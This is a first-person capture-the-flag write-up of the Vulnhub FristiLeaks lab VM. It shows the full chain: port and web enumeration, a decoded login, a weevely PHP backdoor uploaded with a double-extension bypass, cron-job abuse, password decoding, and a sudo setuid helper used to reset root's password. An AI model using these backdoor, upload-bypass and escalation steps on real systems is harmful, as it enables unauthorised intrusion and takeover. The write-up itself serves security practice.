Vulnhub fristileaks
Vulnhub fristileaks
Enumeration
We’ll start with the usual NMAP our home boy!
nmap --vv -sS -T 4 -Pn -A -sC -p- 192.168.1.124
We only see a 80 open to us but we can see that
Reason: 65396 no-responses and 138 host-prohibiteds
We also see there’s some info in the robots.txt
http-robots.txt: 3 disallowed entries
/cola /sisi /beer
There’s also a version of Apache -> http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
There’s also a kernel detect ->
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Nikto
Since it’s running a webserver let’s run a nikto on it.
nikto -h 192.168.1.124
Looking at the results we get a little bit more info about more folder found in
the website
There’s an additional /icons/, /images/
dirb
Now let’s run dirb to try to find even more directories
dirb http://192.168.1.124 /usr/share/wordlists/dir/common.txt
This did not give us any valuable information
I’ll try the big.txt wordlist and meanwhile look at the source code of the
website.
Two hours later
I just couldn’t find what to do so i had to go read a writeup…
The url was /fristi/ ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ……………………………………………………………………………………………………………………………………………………………………………………….. ………………………………………………………………………………………………………………………………………………………………………………………..
I only that took that information and stopped reading, let’s continue.
That leads us to a page with a login and a picture. First reflex is looking at the source code.
We can notice that there’s a comment saying
<!—
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
—>
On the top it’s also written
We use base64 encoding for images so they are inline in the HTML. I read
somewhere on the web, that thats a good way to do it
And near the end of the page we got a base64 in comment out.
We can assume that’s another picture.
Let’s use that code instead of the one loading before trying to break the
login. Or we can use burp intruder to try to break it while we’re doing the
image base64 thingy. That’s a good idea.
So by googling base64 image decoder and pasting the code, we get this word
keKkeKKeKKeKkekkek
Meanwhile i had a burp intruder try to bypass the login using sql injection and
none went throught.
In the source page the comment had a name eezeepz.
Let’s try eezeepz:keKkeKKeKKeKkekkek what if…
And it worked…
So we got an upload page, it smells like a reverse shell
Life is Weevely
Let’s create generate a backdoor in weevely.
weevely generate toor me.php
We’ll upload that php file in the upload page.
But wait a second it doesn’t take php extensions.
We’ll rename me.jpg and try to upload it again and it works perfectly.
It’s being uploaded to uploads/
Let’s try to access the page http://192.168.1.124/fristi/uploads/me.jpg
And there it is.
Weevely the beautiful
Let’s connect to our backdoor
weevely http://192.168.1.124/fristi/uploads/me.jpg toor
And it doesn’t work. I’m assuming it absolutely needs a .php extension ?
After googling the internet for an hour, i found a page that mentions that if we add php in the name file it will allow the php to execute even though it’s a jpg.
So i renamed it to me.php.jpg and tried to weevely again and BOOM! Houston we are in.
Enumeration
Let’s looks for the kernel and OS
uname -a
cat /etc/lsb-re*
The cat won’t work because we’re dealing with Centos instead of a debian machine.
So we got a Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
The thing is it’s a patched kernel, so the version of the kernel could already have patched most of the exploits we would find for that version.
Let’s use :audit_filesystem
We don’t get much from it, we got a /home/eezeepz which is the same username that we used to login in the website.
Let’s investigate it.
User eezeepz
If we ls -l his home directory we find a lot of executables. Ummmm. Maybe we can add them to our path file so we can use them ? Do we need to use them ?
Going through the list there’s a note.txt that has information inside.
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don‘t forget to specify the full path for each binary!
Just put a file called “runthis” in /tmp/, each line one command. The
output goes to the file “cronresult” in /tmp/. It should
run every minute with my account privileges.
Interesting. /home/admin ?
We got this commands to achieve root ?
cbq
cciss_id
cfdisk
chcpu
chgrp
chkconfig
chmod
chown
clock
consoletype
cpio
cryptsetup
ctrlaltdel
cut
halt
hostname
hwclock
kbd_mode
kill
killall5
kpartx
nameif
nano
netreport
netstat
new-kernel-pkg
nice
nisdomainname
nologin
notes.txt
tar
taskset
tc
telinit
touch
tracepath
tracepath6
true
tune2fs
weak-modules
wipefs
xfs_repair
ypdomainname
zcat
zic
Crontab
So the message told us that we could execute commands as admin by creating a runthis file in /tmp. I’ll start by chmod 777 /home/admin
vi runthis
/home/admin/chmod 777 -R /home/admin
We’ll wait for a minute then we’ll be able to enter /home/admin folder.
Once we’re inside with ls -la to see what’s inside.
ls -la
drwxrwxrwx. 3 admin admin 4096 Apr 28 20:43 .
drwxr-xr-x. 5 root root 4096 Nov 19 2015 ..
-rw-r--r--. 1 admin admin 18 Sep 22 2015 .bash_logout
-rw-r--r--. 1 admin admin 176 Sep 22 2015 .bash_profile
-rw-r--r--. 1 admin admin 124 Sep 22 2015 .bashrc
-rwxr-xr-x 1 admin admin 45224 Nov 18 2015 cat
-rwxr-xr-x 1 admin admin 48712 Nov 18 2015 chmod
-rw-r--r-- 1 admin admin 737 Nov 18 2015 cronjob.py
-rw-r--r-- 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rw-r--r-- 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxr-xr-x 1 admin admin 90544 Nov 18 2015 df
-rwxr-xr-x 1 admin admin 24136 Nov 18 2015 echo
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 egrep
-rwxr-xr-x 1 admin admin 163600 Nov 18 2015 grep
-rw-r--r-- 1 admin admin 12 Apr 28 17:18 me.txt
-rwxr-xr-x 1 admin admin 85304 Nov 18 2015 ps
-rw-r--r-- 1 admin admin 113 Apr 30 18:21 ps.txt
drwxr-xr-x 2 apache apache 4096 Apr 28 20:43 resulsts
-rw-r--r-- 1 apache apache 8563 Apr 28 20:43 rpm_res
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
We got a file called whoisyourgodnow.txt from fritigod that we can cat.
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
There’s also a python script with a cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
We also got a python script that seems to encrypt in base64 then uses rot13 (ceasar cipher) to “reencrypt it”
Another important part of the small script, it encodes the string in base64 then reverses it then does rot13.
So if we take the string in whoisyourgodnow.txt
We decode the rot13 on it (shift 13 characters)
RFn0AKnlMHMPIzpyuTI0ITG
becomes ESa0NXayZUZCVmclhGV0VGT
Then we take ESa0NXayZUZCVmclhGV0VGT
and reverse it TGV0VGhlcmVCZUZyaXN0aSE
Now we decode TGV0VGhlcmVCZUZyaXN0aSE
and it gives LetThereBeFristi!
Well that doesn’t help much but at least we understand what the script does.
We can now also use it on the cryptedpass.txt and it gives out thisisalsopw123
We now got to strings that look to be passwords.
I’ll spawn a tty shell to su to another user using python
python -c 'import pty; pty.spawn("/bin/sh")'
I’ll try login as fristigod using the LetThereBeFristi
Fristigod
It worked! We’re now logged as Fristigod, let’s search for all the files that his the owner.
find / -user 502
Near the end of the list we got some interesting hits
/var/fristigod
/var/fristigod/.bash_history
/var/fristigod/.secret_admin_stuff
Let’s investigate those files.
cat /var/fristigod/.bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit
We can see that fristigod is running some commands as fristi. Interesting.
If we file
doCom, we notice that it’s an executable.
file doCom
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
We’ll use the same command as in the bash_history file
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...
If we look at the bash_history we can see that he reads the file
/var/log/secure a file that is only readable by root. This means that any
command that we append will run as root. Or at least i think so.
We’ll try to change root’s password.
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom passwd root
New password: lol123
BAD PASSWORD: it is based on a dictionary word
BAD PASSWORD: is too simple
Retype new password: lol123
su root
id
uid=0(root) gid=0(root) groups=0(root)
And there it is.
GG